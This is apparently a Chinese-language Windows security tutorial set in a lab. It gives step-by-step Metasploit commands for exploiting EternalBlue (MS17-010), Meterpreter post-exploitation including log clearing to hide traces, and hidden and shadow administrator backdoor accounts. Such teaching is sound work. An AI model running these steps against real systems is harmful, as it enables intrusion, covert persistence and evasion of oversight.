Windows系统基础安全

声明：本文中所有操作均在合法合规的靶场环境、虚拟环境中进行。

任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。

• 操作系统

Operating System，简称OS，是管理和控制计算机硬件与软件资源的计算机程序，是直接运行在“裸机”上的最基本的系统软件，任何其他软件都必须在操作系统的支持下才能运行。

• 操作系统的分类

  Windows Linux macOS

• Windows系统的安全风险

01 系统自身/服务安全

02 第三方应用程序安全

• Windows经典漏洞——MS17-010

永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。

永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。

1.漏洞扫描

nmap -sV -p445 --script=smb-vuln-ms17-010 目标ip

这条nmap命令用于检测目标 IP的 445 端口是否存在 MS17-010（永恒之蓝）漏洞

-sV开启版本探测，识别 445 端口对应的服务版本（如 SMB 协议版本）

-p445指定仅扫描 445 端口（SMB 服务默认端口，文件共享端口）

--script=smb-vuln-ms17-010调用 nmap 内置的 MS17-010 漏洞检测脚本

执行后重点看输出中的关键信息：

漏洞存在：输出包含VULNERABLE，说明目标存在永恒之蓝漏洞。

漏洞不存在：输出包含NOT VULNERABLE或无漏洞相关提示，说明目标已打补丁 / 未开启 SMBv1。

扫描失败：若提示Connection refused，可能是 445 端口未开放；Timeout可能是目标防火墙拦截。

2.进入msf控制台

msfconsole

注意：（美少妇）每次启动时界面可能不一样哦，♥仅仅是个logo~

3.搜索相关模块并利用

search ms17-010 # 搜索相关模块 use exploit/windows/smb/ms17_010_eternalblue # 选择永恒之蓝利用模块（输入对应序号也可）

4.查看需要配置的参数

show options # 查看需要配置的参数

5.配置攻击参数

set rhosts 目标IP # 设置目标机IP

6.执行攻击，获取 Meterpreter 会话

exploit # 或输入 run 执行攻击

攻击成功后，将获得目标机的 Meterpreter 交互式会话

Meterpreter 会话是你通过 Metasploit 成功攻陷目标主机后建立的高级交互式控制通道，也是后渗透测试的核心操作入口 —— 它不是普通的 CMD/Shell，而是一个功能强大的内存级交互环境，支持无文件落地、权限提升、隐蔽控制等核心能力。

在 Meterpreter 会话中，执行run vnc是用来在目标主机上临时开启 VNC 服务，并建立远程桌面连接的快捷命令，无需在目标主机手动安装 VNC 客户端 / 服务端。

shell 获取目标机 CMD 命令行，执行chcp 65001（UTF-8）或chcp 936（GBK）解决中文乱码

• Meterpreter 核心操作（常用命令）

ps -查看目标机所有运行进程

screenshot -截取目标机当前屏幕（图片保存至 Kali 本地）

shell -获取目标机 CMD 命令行（输入 chcp 65001 解决中文乱码）

clearev -清除目标机系统日志（掩盖攻击痕迹）

getuid -查看当前获取的用户权限

download -目标文件路径 本地保存路径 下载目标机文件到 Kali

upload -本地文件路径 目标机保存路径 上传 Kali 文件到目标机

• Windows用户与组

Windows是多用户操作系统，用户组是一系列用户的集合，组内的用户自动具备该组所设置的权限。

windows用户： system：本地机器上拥有最高权限的用户（为系统核心组件访问文件资源提供权限） Administrator：默认系统管理员用户 Standard User：标准用户 guest：来宾用户

• 用户管理命令

net user：查看用户

net user 用户名 密码 /add：创建用户

net user 用户名 新密码：修改用户密码

net user 用户名 /del：删除用户

net localgroup 组名 用户名 /add：将用户添加到特定组

• Windows 远程 RDP 连接（远程桌面连接）的前提

1. 两台电脑（控制端、被控制端）必须处于同一网络（比如连同一个 WiFi、同一个路由器，或都接入公司内网），网络能正常连通，不能断网。

2. 被控制的电脑（要被远程的那台），必须开启 “远程桌面” 功能（默认关闭，需手动设置开启，允许其他电脑远程控制它）。

   命令开启远程桌面服务：（需要管理员身份运行cmd窗口）

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

1. 被控制电脑需有可登录的 Windows 账号和密码（账号需有远程访问权限，没有密码或权限不够，无法成功连接）。

2. 控制端电脑（操作的那台），需知道被控制电脑的IP 地址（可通过前面学的 ipconfig 命令查询），或同一网络下的电脑名称，才能定位并连接。

   补充：两台电脑的防火墙，需允许 “远程桌面” 相关连接（默认开启远程桌面后，防火墙会自动放行，不用额外操作）

• Windows 文件权限

Windows利用用户与组进行文件与软件执行的权限管理。

完全控制 修改 读取和执行 列出文件夹内容 读取 写入

• 安全后门

隐藏用户

创建隐藏用户【只是命令提示窗口中net user看不见】

net user gaga$ 123456 /add

影子用户

1、创建隐藏用户

2、打开注册表win+r→regedit

Windows管理用户的注册表键值：HKEY_LOCAL_MACHINE\SAM\SAM

3、修改权限

4、分别导出隐藏用户信息和权限的注册表，以及管理员用户权限的注册表；修改F值。将隐藏用户做成管理员用

户的影子。

5、删除隐藏用户gaga$

6、导入影子用户权限、用户信息注册表。复位权限

7、尝试登录